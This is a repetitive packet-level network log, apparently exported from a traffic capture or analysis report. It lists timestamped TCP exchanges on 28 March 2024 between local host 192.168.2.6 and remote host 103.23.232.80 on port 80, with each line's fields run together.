                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522047043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522053957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522068024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522079945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522094011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522103071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522106886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522131920 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522141933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522187948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522198915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522212029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522224903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522269011 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522289991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522304058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522325993 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522341967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522356033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522367954 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522384882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522392035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522396088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522417068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522458076 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522460938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522475958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522500992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522515059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522522926 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522528887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522552967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522557974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522609949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522641897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522651911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522682905 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522682905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522699118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522712946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522752047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522775888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522815943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522825956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522839069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522850990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522865057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522887945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522888899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522913933 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522933006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522945881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522984982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.522995949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523010015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523041964 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523058891 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523072004 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523085117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523098946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523097992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523112059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523119926 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523152113 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523163080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523175955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523199081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523204088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523242950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523293972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523308039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523339987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523346901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523360014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523366928 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523372889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523396015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523397923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523421049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523446083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523468971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523511887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523525953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523554087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523577929 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523592949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523607016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523631096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523643970 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523662090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523711920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523725033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523746014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523750067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523760080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523773909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523777008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523799896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523854971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523868084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523881912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523894072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523907900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523907900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523921013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523933887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523943901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523957014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523968935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.523993969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524003983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524007082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524030924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524036884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524069071 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524071932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524090052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524105072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524141073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524167061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524207115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524238110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524251938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524264097 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524293900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524302959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524313927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524326086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524333954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524339914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524363041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524363995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524408102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524432898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524446964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524496078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524509907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524522066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524534941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524540901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524560928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524590015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524607897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524621964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524666071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524667025 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524693012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524705887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524710894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524746895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524760962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524772882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524785042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524810076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524816990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524837017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524851084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524851084 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524882078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524894953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524909019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524945974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524954081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.524967909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525008917 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525015116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525028944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525082111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525095940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525119066 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525137901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525146961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525175095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525192976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525207043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525218010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525242090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525250912 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525278091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525352955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525367022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525393963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525414944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525417089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525449991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525489092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525491953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525537014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525551081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525564909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525577068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525589943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525590897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525616884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525629044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525672913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525686979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525698900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525712013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525723934 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525727034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525741100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525752068 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525789976 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525805950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525819063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525831938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525856972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525908947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525922060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525939941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525944948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525974989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525981903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.525990963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526055098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526067972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526078939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526091099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526092052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526119947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526120901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526135921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526145935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526189089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526228905 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526288986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526302099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526314020 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526329041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526348114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526355982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526364088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526390076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526408911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526434898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526448011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526473045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526484966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526493073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526506901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526516914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526552916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526559114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526566982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526578903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526592970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526623964 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526649952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526652098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526664019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526698112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526706934 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526731968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526798964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526813030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526824951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526840925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526869059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526870966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526881933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526911020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526933908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526957035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.526976109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527019024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527061939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527096033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527102947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527110100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527136087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.527159929 CET8049718103.23.232.80192.168.2.6
